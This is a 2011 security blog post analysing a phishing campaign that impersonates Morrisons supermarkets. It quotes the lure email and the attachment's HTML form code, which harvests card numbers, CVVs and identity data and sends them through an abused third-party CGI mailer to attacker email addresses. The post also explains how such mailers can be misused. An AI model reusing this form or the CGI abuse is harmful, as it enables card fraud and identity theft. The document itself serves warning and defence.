Categorized | Security

Morrisons supermarkets subject for phishing campaign

MX Lab, http://www.mxlab.eu, started to intercept phishing emails targettting the online activities of the Morrisons supermarkets.

The emails has the subject “New Morrisons Offer” and is sent from the spoofed email address “MORRISONS <noreply@morrisons.co.uk>” and has the folowing body contents:

This email is intended to inform you that there is a new offer at Morrisons Store.

This is a 2 weeks time offer. Register your card online and you will get 35% discount when using your card to pay in our stores.

In order to start the registration process please fill and submit the form attached to this email.

© Copyright Wm Morrison Supermarkets plc 2011. All rights reserved.

Attached to the email is the file Registration_Form.htm and once opened in a browser you will have the following screen:

The images and the web site style is taken from the official www.morrisons.co.uk web site but the form contents will be sent to hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi.

When examing the form coding you will notice that this is in fact a CGI (Common Gateway Interface) exploit ,or abuse, as well.

<form style=”margin: 0px;” action=”hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi” method=”post”> <input name=”data_order” type=”hidden” value=”first_name,last_name,dob_d,dob_m,dob_y,mmn,address,city,state,zip,phone_number,
==================,document_type,document_no,issue_date,
==================,bank_name,name_on_card,card_number,exp_m,exp_y,cvv” />
<input name=”submit_to” type=”hidden” value=”adw.gray@gmail.com” />
<input name=”submit_by” type=”hidden” value=”abcdursulica@gmail.com” />
<input name=”form_id” type=”hidden” value=”Morrisons Fulls 3″ />
<input name=”ok_url” type=”hidden” value=”http://www.morrisons.co.uk/Offers/” />

These guys have figured out the values that the CGI needs in order to process the webform. It’s not too difficult either because at http://theburleyinn.co.uk/contact.html the CGI is called for a contact web form. All the details are in the HTML page.

The major drawback on this CGI is that there is no control or check from where the CGI query will come from. It should be at least chech wether the CGI request is coming from the samen web site or local hosting server. If this is not the case it should reject the CGI request by default. It can be abused by anyone with some basic knowledge to send out for example a massive spam campaign.

Once the data is submitted on the phishing form, you will be redirected to the official site at http://www.morrisons.co.uk/Offers/.

Phishing attempts like this, where an HTML page is present as attachment instead of a embedded URL, are still being used. The main advandage is that it is more difficult to detect with technologies like Intent Analysis or SUBL that need an URL instead. But on the other hand, as a receiver of this kind of phishing emails, you should be more aware that these kind of emails are not to be trusted. No company in the world is sending you an attachment by email with the request to fill in your credit card details.

[Update March 14th, 2011 - 4:30 PM Local Belgian Time]

We have noticed new phishing emails coming from the spoofed email addresses:

offers@morrissons-discount.com

The attached HTML webform is requesting a CGI on a different server:

hxxp://www.janus-systems.com/cgi-bin/bnbform.cgi.

Related Posts
  • Conducting a Phishing Campaign in Metasploit Pro
    So new job gets me new fun toys. Figured i'd try the fancy shmancy tools and do a phish campaign with metasploit pro. 1. Go click on campaigns and star filling stuff out like what you want to call i...
  • Fresh Twitter Phishing Campaign via Direct Messages and Tweets
    A fresh twitter phishing campaign is underway and using both tweets and direct messages to spread. The messages contain text such as “hah, I think I seen u on here” and “wow you look different on her...
  • Cyber Crooks All Set to Crash the British Royal Wedding
    As we have seen with many major events in the past, news of the British Royal Wedding is currently being used by cyber criminals to bolster their spam campaigns and push rogue antivirus software throu...
  • New spamvertized campaign theme
    The wave of  United Parcel Service, DHL Global and Post Express Office spam - which has been so prolific and leading to scareware infections - changed to Bobijou Inc. over the Easter weekend.Howe...
  • More fake Twitter emails
    It’s been over a month since we wrote about fake Twitter email messages, and if it worked once for scammers, they’ll certainly try it again. Commtouch labs is seeing large quantities of &#...
  • The Rise of the Targattacks*: Cyber espionage and sabotage: the new way – *Abbr.: targeted attacks
    During the last 18 months we saw a growing number of targeted attacks against numerous companies and organizations. Let's briefly have a look at some of them: The Aurora Attack: an attack that began ...
  • Spammers Intend to Make You an Easter Bunny
    Easter is a Christian holiday centered on the death of Jesus Christ and His subsequent resurrection several days later. Hence Easter is an important holiday for Christians. But what gets associated wi...
  • Western Union hack tool: real or hoax?
    When something sounds too good to be true I always take it with a grain salt.I came across this tool that "can be used to make western union transfers without any credit card. You even don't need any ...
  • Boxes of Money !
    Phishing and 419 scams have been around for a while now. However, sometimes they never cease to amaze when it comes to their tactics. We caught this most recent one in one of our Honeypots and thought...
  • Bank of Baroda Phishing Scam
    Its now Bank of Baroda getting targeted for the phishing attacks. A mail having subject line : MESSAGE TO ALL BARODA CONNECT USERS!!! getting circulated containing an attachment. If you click to ...

Comments are closed.

Security Status

Beware Facebook "Timeline" scams http://t.co/W5EW0cVv
5 months ago
Nigerian government (unknowingly) hosts phishing website http://t.co/uQd42ENw
5 months ago
PCMag Awards McAfee All Access its Editors’ Choice: SANTA CLARA, Calif.--(BUSINESS WIRE)--McAfee today announced... http://t.co/FakV7Vd8
5 months ago
RT @mikko: I hadn't noticed Google Maps has added 3D models of buildings. Here's a (very accurate) view of F-Secure HQ in Helsinki http://t.co/IKfAZlak
5 months ago
North Koreans aren't known for their online presence. But others may be lured into clicking Kim Jong-Il 'videos' too http://t.co/yQOon6YT
5 months ago
How to Protect Your Professional Reputation on Facebook Timeline http://t.co/I4bcR2VN
5 months ago
This is pretty impressive from @Softpedia: Facebook scans 2 trillion link clicks and blocks 220 million posts each day http://t.co/vKsn9gNl
5 months ago
Need for integrated approach to security in industrial control systems - http://t.co/tPBCNOow with @PikeResearch
5 months ago
Some free-based music we play at work http://t.co/xu5agZfc
5 months ago
Japan’s cyber defense weapon: a virus. It includes quotes by @Luis_Corrons via @InfosecurityMag
5 months ago